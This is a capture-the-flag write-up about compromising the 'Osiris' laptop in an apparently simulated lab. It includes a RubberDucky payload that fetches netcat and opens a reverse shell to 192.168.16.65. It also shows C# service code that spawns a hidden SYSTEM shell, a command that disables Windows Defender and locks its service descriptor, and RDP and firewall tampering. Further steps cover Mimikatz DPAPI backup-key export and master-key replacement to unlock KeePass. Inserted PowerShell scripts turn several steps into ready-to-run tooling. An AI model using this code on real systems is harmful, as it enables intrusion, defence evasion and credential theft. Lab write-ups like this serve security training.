Osiris
Story:
As a final blow to Windcorp's security, you intend to hack the laptop of the
CEO, Charlotte Johnson. You heard she has a boatload of Bitcoin, and
those seem mighty tasty to you.
But they have learned from the previous hacks and have introduced strict
security measures.
However, you dropped a wifi RubberDucky on her driveway. Charlotte and
her personal assistant Alcino just drove up to her house, and he picks up
the bait as they enter the building.
Sitting in your black van, just outside her house, you wait for them to plug
in the RubberDucky (curiosity kills cats, remember?) and once you see the
Ducky’s Wifi network pop up, you make a connection to the RubberDucky
and are ready to send her a payload…
This is where your journey begins. Can you come up with a payload and
get that sweet revshell?
And if you do, can you bypass the tightened security? Remember,
antivirus tools aren’t the sharpest tools in the shed, sometimes changing
the code a little bit and recompiling the executable can bypass these
simplest of detections.
As a final hint, remember when you pwned their domain controller? You
might need to revisit Ra to extract a key component to manage this task;
you will need the keys to the kingdom...
Info:
To simulate the payload delivery, we have put up a TFTP-server on the
target computer. Use that, to put your RubberDucky-scripts on the target
computer.
Important:
The TFTP server itself, any software or scripts you find regarding the
RubberDucky is not a part of the challenge.
Recon
Nothing much to do at this stage. We cannot Nmap-scan the target,
because we do not really have access to its network interface (all ports are
closed to simulate this).
We try some RubberDucky payloads using PowerShell, but nothing really
sticks. They have upped their security, remember? So we start thinking
about what they could have done.
Windows Defender is surely active, and we have seen them use PowerShell
Constrained Language Mode (CLM) on Set earlier, so it is safe to assume they
use it here too; there really is no need for full-blown PowerShell on the CEO's
laptop. AppLocker is probably in use as well.
We keep both in mind: CLM still lets us run cmdlets such as Invoke-WebRequest,
and the default AppLocker executable rules allow anything under C:\Windows,
which makes the user-writable c:\windows\temp a good place to drop nc64.exe.
DELAY 500
GUI r
DELAY 500
STRING powershell -W hidden
ENTER
DELAY 1000
ENTER
STRING Invoke-WebRequest http://192.168.16.65/nc64.exe -outfile c:\windows\temp\nc64.exe
ENTER
DELAY 1000
STRING c:\windows\temp\nc64.exe 192.168.16.65 4444 -e cmd
ENTER
Sending
In c:\script we see that the user "scheduler" has full access to the two scripts, while we (BUILTIN\Users) only have read:
C:\script>cacls *
cacls *
C:\script\copyprofile.cmd BUILTIN\Administrators:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Users:(ID)R
OSIRIS\scheduler:(ID)F
C:\script\update.vbs BUILTIN\Administrators:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Users:(ID)R
OSIRIS\scheduler:(ID)F
dir /s c:\temp
Volume in drive C has no label.
Volume Serial Number is DEA7-4E33
Directory of c:\temp
Directory of c:\temp\OpenVPN
Directory of c:\temp\OpenVPN\x86_64
When checking out c:\program files\IVPN Client, we find a folder with the
same name "OpenVPN" inside. It is also recently modified. Part of the cacls output:
CREATOR OWNER:(OI)(CI)(IO)(ID)F
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO)(ID)(special access:)
    GENERIC_READ
    GENERIC_EXECUTE
    GENERIC_READ
    GENERIC_EXECUTE
But on "IVPN Service" we find that the user "scheduler" has write access
(the cacls special access entry for OSIRIS\scheduler), while everything else
is the usual Program Files ACL:
    FILE_GENERIC_EXECUTE
    FILE_READ_DATA
    FILE_WRITE_DATA
    FILE_APPEND_DATA
    FILE_READ_EA
    FILE_WRITE_EA
    FILE_EXECUTE
    FILE_READ_ATTRIBUTES
    FILE_WRITE_ATTRIBUTES
NT SERVICE\TrustedInstaller:(ID)F
NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
NT AUTHORITY\SYSTEM:(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(ID)R
BUILTIN\Users:(OI)(CI)(IO)(ID)(special access:)
    GENERIC_READ
    GENERIC_EXECUTE
CREATOR OWNER:(OI)(CI)(IO)(ID)F
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO)(ID)(special access:)
    GENERIC_READ
    GENERIC_EXECUTE
    GENERIC_READ
    GENERIC_EXECUTE
An idea of what is running here, and how it could be exploited, is forming:
a service binary sitting in a path with spaces, and a second account that can
write next to it.
Running update.vbs gives no output, but no error either, and we find our test
file where we hoped. The service itself, seen through WMI, runs as LocalSystem
from an unquoted PathName containing spaces:
PSComputerName : OSIRIS
Name : IVPN Client
Status : OK
ExitCode : 0
DesktopInteract : False
ErrorControl : Normal
PathName : C:\Program Files\IVPN Client\IVPN Service.exe
ServiceType : Own Process
StartMode : Auto
__GENUS : 2
__CLASS : Win32_Service
__SUPERCLASS : Win32_BaseService
__DYNASTY : CIM_ManagedSystemElement
__RELPATH : Win32_Service.Name="IVPN Client"
__PROPERTY_COUNT : 26
__DERIVATION : {Win32_BaseService, CIM_Service,
CIM_LogicalElement, CIM_ManagedSystemElement}
__SERVER : OSIRIS
__NAMESPACE : root\cimv2
__PATH : \\OSIRIS\root\cimv2:Win32_Service.Name="IVPN
Client"
AcceptPause : False
AcceptStop : True
Caption : IVPN Client
CheckPoint : 0
CreationClassName : Win32_Service
DelayedAutoStart : False
Description :
DisplayName : IVPN Client
InstallDate :
ProcessId : 1040
ServiceSpecificExitCode : 0
Started : True
StartName : LocalSystem
State : Running
SystemCreationClassName : Win32_ComputerSystem
SystemName : OSIRIS
TagId : 0
WaitHint : 0
Scope : System.Management.ManagementScope
Path : \\OSIRIS\root\cimv2:Win32_Service.Name="IVPN
Client"
Options : System.Management.ObjectGetOptions
ClassPath : \\OSIRIS\root\cimv2:Win32_Service
Properties : {AcceptPause, AcceptStop, Caption,
CheckPoint...}
SystemProperties : {__GENUS, __CLASS, __SUPERCLASS, __DYNASTY...}
Qualifiers : {dynamic, Locale, provider, UUID}
Site :
Container :
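The check behind that idea, as an added example (not from the write-up): a PowerShell function that lists every service whose PathName is unquoted and contains spaces, expands it into the filenames the Service Control Manager will try before the real binary, and probes whether each of those directories is writable by the current user. It generalises the manual cacls inspection above to all services on the host; names and the probe-file scheme are my own, and only cmdlets are used so it also runs under Constrained Language Mode.

```powershell
# Added example (not from the write-up): find unquoted service paths, the
# filenames the SCM will try before the real binary, and whether we can write
# there. Windows splits an unquoted ImagePath at each space and appends ".exe",
# so C:\Program Files\IVPN Client\IVPN Service.exe is resolved via
#   C:\Program.exe -> C:\Program Files\IVPN.exe -> C:\Program Files\IVPN Client\IVPN.exe
# before the intended file.

# Probe by creating and deleting a file: an ACL listing needs interpretation,
# an actual write does not.
function Test-DirWritable([string]$Dir) {
    if (-not (Test-Path -LiteralPath $Dir -PathType Container)) { return $false }
    $probe = Join-Path $Dir ("probe-$(Get-Random).tmp")
    try {
        New-Item -ItemType File -Path $probe -ErrorAction Stop | Out-Null
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

# Expand one service's PathName into the candidate executables, in lookup order.
function Get-PathCandidate([string]$PathName) {
    if ($PathName -match '^"') { return }                    # properly quoted, nothing to do
    $exe = $PathName -replace '(?i)(\.exe).*$', '$1'          # drop service arguments
    if ($exe -notmatch ' ') { return }                        # "svchost.exe -k x": gap only in the args
    $parts = $exe -split ' '
    for ($i = 1; $i -lt $parts.Count; $i++) {
        ($parts[0..($i - 1)] -join ' ') + '.exe'
    }
}

function Get-UnquotedServicePath {
    foreach ($svc in Get-CimInstance Win32_Service) {
        foreach ($c in Get-PathCandidate $svc.PathName) {
            [pscustomobject]@{
                Service     = $svc.Name
                RunsAs      = $svc.StartName
                StartMode   = $svc.StartMode
                Candidate   = $c
                DirWritable = Test-DirWritable (Split-Path $c -Parent)
            }
        }
    }
}

Get-UnquotedServicePath | Format-Table -AutoSize
```

A row with RunsAs LocalSystem and DirWritable True is the one to go after; on Osiris the writable column would only turn True for the scheduler account, which is why the write-up goes through update.vbs instead of writing the file directly.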
We need to make a service exe; an ordinary exe will not do, because the
Service Control Manager expects the binary to register with it
(StartServiceCtrlDispatcher) and kills anything that does not answer within
the start timeout. We could try MSFVenom (it has an exe-service output
format), but that exe will be caught by Defender, which knows Metasploit a
bit too well…
get-MpPreference
AllowNetworkProtectionOnWinServer : False
AttackSurfaceReductionOnlyExclusions :
AttackSurfaceReductionRules_Actions : {1, 1, 1, 1...}
AttackSurfaceReductionRules_Ids : {01443614-cd74-433a-
b99e-2ecdc07bfc25,
26190899-1602-49e8-8b27-
eb1d0a1ce869,
3B576869-A4EC-4529-8536-
B80A7769E899,
5BEB7EFE-
FD9A-4556-801D-275E5FFC04CC...}
--- snip ---
We can see there are a lot of ASR rules in play here. In fact every rule is
enabled, and with action 1, which means Block rather than Audit.
Rules explained
The rules below are taken from the Microsoft documentation. Every one of them
supports file & folder exclusions and requires Windows 10 version 1709 (RS3,
build 16299) or greater, except the last one (marked *).

Rule name | GUID
Block executable content from email client and webmail | BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550
Block all Office applications from creating child processes | D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Block Office applications from creating executable content | 3B576869-A4EC-4529-8536-B80A7769E899
Block Office applications from injecting code into other processes | 75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84
Block JavaScript or VBScript from launching downloaded executable content | D3E037E1-3EB8-44C8-A917-57927947596D
Block execution of potentially obfuscated scripts | 5BEB7EFE-FD9A-4556-801D-275E5FFC04CC
Block Win32 API calls from Office macros | 92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B
Block executable files from running unless they meet a prevalence, age, or trusted list criterion | 01443614-cd74-433a-b99e-2ecdc07bfc25
Use advanced protection against ransomware | c1db55ab-c21a-4637-bb3f-a12568109d35
Block credential stealing from the Windows local security authority subsystem (lsass.exe) | 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2
Block process creations originating from PSExec and WMI commands | d1e49aac-8f56-4280-b9ba-993a6d77406c
Block untrusted and unsigned processes that run from USB | b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4
Block Office communication application from creating child processes | 26190899-1602-49e8-8b27-eb1d0a1ce869
Block Adobe Reader from creating child processes | 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c
Block persistence through WMI event subscription * | e6db77e5-3df2-4cf1-b95a-636979351e5b

* File & folder exclusions not supported; requires Windows 10 version 1903
(build 18362) or greater.
https://gist.github.com/tyranid/c65520160b61ec851e68811de3cd646d
We try it out on a local Windows machine, but for some reason unknown to us
at the moment, it seems we cannot add a task running as "NT AUTHORITY\SYSTEM"
on a domain-joined computer that is offline from the domain. The command line
the task would run stops the WinDefend service from starting and then rewrites
its security descriptor so that Everyone (WD) and the owner (OW) are denied
all access, which keeps anyone from simply starting it again:
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'
https://github.com/mattymcfatty/unquotedPoC
We clone the project and build a service that runs our custom Netcat, which
already resides in c:\windows\temp\. The relevant part of the service class
(InitializeComponent, with our command inserted):
/// <summary>
/// Required method for Designer support - do not modify
/// the contents of this method with the code editor.
/// </summary>
private void InitializeComponent()
{
    this.eventLogSimple = new System.Diagnostics.EventLog();
    ((System.ComponentModel.ISupportInitialize)(this.eventLogSimple)).BeginInit();
    //
    // SimpleService
    //
    // Spawn the reverse shell as soon as the service object is constructed,
    // i.e. before the SCM even gets an answer to its start request. The child
    // inherits LocalSystem from the service process.
    System.Diagnostics.Process process = new System.Diagnostics.Process();
    System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();
    startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
    startInfo.FileName = "cmd.exe";
    // "/c" makes cmd.exe execute the string and exit; without /c or /k cmd
    // ignores the rest of its command line and just sits there.
    startInfo.Arguments = "/c c:\\windows\\temp\\nc64.exe 192.168.16.65 4455 -e cmd";
    process.StartInfo = startInfo;
    process.Start();
    this.ServiceName = "Not The Service You Think It Is";
    ((System.ComponentModel.ISupportInitialize)(this.eventLogSimple)).EndInit();
}
To exploit the unquoted service path, our newly compiled service needs to be
named ivpn.exe and placed in c:\program files\IVPN Client\. The SCM resolves
the unquoted PathName C:\Program Files\IVPN Client\IVPN Service.exe by trying
C:\Program.exe, C:\Program Files\IVPN.exe and C:\Program Files\IVPN Client\IVPN.exe,
in that order, before the real binary, and the last of those is the location we
can get a file into.
We run the vbscript, then check that our binary has arrived where we planned.
And it has.
We have set up our Netcat to call home on 4455, so we put up a listener.
Then the moment of truth: we restart the service, hoping to get a revshell
back on 4455.
And we do.
Now that we are SYSTEM, the sky is the limit… but we are still restricted by
that pesky Defender.
We start the listener again and wait for our service to call home once more.
It does.
We run the hash through John the Ripper, but it does not manage to crack it
for us.
So, let's replace it with a password of our choosing:
● user : WINDCORP\chajoh
● password : NewPassword123#
● ntlm : bce4433c7aafc0dbafcc69883f050a15
First, Network Level Authentication has to go. NLA needs a domain controller
to validate a domain account, and there is none to reach, so we disable it:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TCP" /v UserAuthentication /t REG_DWORD /d "0" /f
Then give "Everyone" logon rights. By default only Administrators and
members of Remote Desktop Users can use RDS, and we cannot add Charlotte to
Administrators, because she is a domain account and we are offline from the
domain.
But we can add Everyone…
Deactivate the firewall.
We find the logged-on user's session ID and log him out, or else he would
get a prompt asking to allow or reject our RDP login.
Then log in.
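The RDP preparation above as one script, added here as an example and not part of the original write-up. It is meant to be run from the SYSTEM reverse shell and assumes the default RDP-Tcp listener and "Remote Desktop Users" group names. The fDenyTSConnections step is my addition in case Remote Desktop itself was never enabled; the write-up does not show whether that was needed.

```powershell
# Added example (not from the write-up): prepare the box for our RDP login,
# run from the SYSTEM shell. Assumes default listener and group names.
$ts = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'

# Make sure the RDP listener is allowed at all (assumption: may already be the case).
Set-ItemProperty -Path $ts -Name fDenyTSConnections -Value 0 -Type DWord

# Disable Network Level Authentication: with the DC unreachable, NLA cannot
# validate a domain account, so the session must reach the classic logon screen.
Set-ItemProperty -Path "$ts\WinStations\RDP-Tcp" -Name UserAuthentication -Value 0 -Type DWord

# Grant "Everyone" the right to log on through RDS without having to resolve
# chajoh's (domain) account. Errors (already a member) are ignored.
net localgroup "Remote Desktop Users" Everyone /add 2>$null

# Open the host firewall for all profiles (the write-up simply deactivates it).
netsh advfirewall set allprofiles state off

# Log off whoever is sitting at the console, otherwise they get an allow/deny
# prompt when we connect. "query session" rows: SESSIONNAME USERNAME ID STATE ...
$activeIds = (query session) |
    Select-String -Pattern '^\s*\S+\s+\S+\s+(\d+)\s+Active' |
    ForEach-Object { [int]$_.Matches[0].Groups[1].Value }
foreach ($id in $activeIds) { logoff $id }
```

The regex only matches rows that carry a user name, an ID and the state Active, so the listener row (rdp-tcp, state Listen) and the services session are left alone.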
We regain access to Ra and export the DPAPI domain backup key with Mimikatz
(and make a note to ourselves that we will always export it when pwning a
domain controller).
Now is the time to use our new NTLM hash (the one we wrote down) to build a
new master key file for KeePass: the domain backup key lets us decrypt
Charlotte's existing DPAPI master key, and the NTLM hash of NewPassword123#
lets us re-encrypt it, so that DPAPI, and therefore KeePass, works once we log
in with the password we chose.
We need to do one thing first. CQMasterKeyAD.exe uses "cqure" as the
hardcoded passphrase for the pfx, while Mimikatz uses "mimikatz" when
exporting it, so we repack the file:
Extract:
openssl pkcs12 -in DMK.pfx -out temp.pem -nodes -passin pass:mimikatz
Repack:
openssl pkcs12 -export -out DMK.pfx -in temp.pem -passout pass:cqure
Do not forget to swap the old and the new file, and to give the new key file
the attributes the original carries (master key files are hidden and system):
attrib "c:\users\chajoh\appdata\roaming\microsoft\protect\S-1-5-21-555431066-3599073733-176599750-1125\a773eede-71b6-4d66-b4b8-437e01749caa" +S +H
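The swap itself, as an added example (not from the write-up): a function that refuses anything whose name is not a master key GUID, keeps a copy of the original outside the Protect folder, drops the re-encrypted file in place and restores the hidden and system attributes, returning whether the result looks right. The function name, the backup location and the .new file name are assumptions; the SID and GUID are the ones from the attrib command above.

```powershell
# Added example (not from the write-up): swap a re-encrypted DPAPI master key
# file into the user's Protect folder, keeping a copy of the original.
function Install-MasterKeyFile {
    param(
        [Parameter(Mandatory)][string]$NewKeyFile,             # re-encrypted key (assumed path)
        [Parameter(Mandatory)][string]$TargetFile,             # ...\Protect\<SID>\<GUID>
        [string]$BackupDir = 'C:\Windows\Temp\mkbackup'        # assumed location for the original
    )
    $name = Split-Path $TargetFile -Leaf
    # Master key files are named by GUID; refuse anything else so we never
    # clobber the Preferred file or something unrelated by mistake.
    if ($name -notmatch '(?i)^[0-9a-f]{8}-([0-9a-f]{4}-){3}[0-9a-f]{12}$') {
        throw "$name does not look like a master key GUID"
    }
    if (-not (Test-Path -LiteralPath $NewKeyFile)) { throw "missing $NewKeyFile" }
    New-Item -ItemType Directory -Force -Path $BackupDir | Out-Null

    # Clear system+hidden first; they must come off together or attrib refuses.
    attrib "$TargetFile" -S -H
    Copy-Item -LiteralPath $TargetFile -Destination (Join-Path $BackupDir $name) -Force
    Copy-Item -LiteralPath $NewKeyFile -Destination $TargetFile -Force
    # Restore the attributes DPAPI's own files carry.
    attrib "$TargetFile" +S +H

    $attrs = [string](Get-Item -Force -LiteralPath $TargetFile).Attributes
    return ($attrs -match 'Hidden') -and ($attrs -match 'System')
}

Install-MasterKeyFile `
    -NewKeyFile 'C:\Windows\Temp\a773eede-71b6-4d66-b4b8-437e01749caa.new' `
    -TargetFile 'C:\Users\chajoh\AppData\Roaming\Microsoft\Protect\S-1-5-21-555431066-3599073733-176599750-1125\a773eede-71b6-4d66-b4b8-437e01749caa'
```

Keeping the original file means the user's real DPAPI state can be put back after the exercise; the Preferred file in the same folder still points at the same GUID, so nothing else needs touching.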
Then, starting KeePass reveals Flag3, the password we are looking for.
We hope you enjoyed pwning Osiris just as much as we did making it! We
learned some interesting things about DPAPI, and we hope you did too!